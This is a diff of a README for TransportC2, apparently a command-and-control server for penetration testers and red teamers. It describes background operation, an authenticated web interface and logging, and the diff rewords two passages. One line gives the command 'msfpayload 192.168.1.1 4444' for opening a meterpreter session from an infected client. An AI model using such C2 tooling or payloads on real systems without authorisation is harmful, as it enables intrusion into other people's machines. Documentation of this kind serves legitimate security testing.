todmephis/transportc2/README.md

 # TransportC2

 ### Summary
 TransportC2 is a command and control server that is able to run in the background as a service.
-This allows penetration testers and red teamers the ability to spend time gathering target machines, without being tied to an active session to the C2.
+This allows penetration testers and red teamers the ability to spend time gathering target machines, without being tied to an active session.
 Interact with clients through a private web interface that requires authentication, and allows administrators to add multiple users.
 All logins, commands, and responses are logged to provide a traceable point of reference.

 Why "Transport"?
 TransportC2 is meant to me a long-term command and control server that allows users to direct payloads to other, shorter-term channels.
-This is exemplified by the built-in Metasploit payload.
-Simply execute "msfpayload 192.168.1.1 4444" on the client to open a meterpreter session on a listening server.
+This is exemplified by the built-in Metasploit payload, simply execute "msfpayload 192.168.1.1 4444" to open a meterpreter session on an infected client.

 ### Server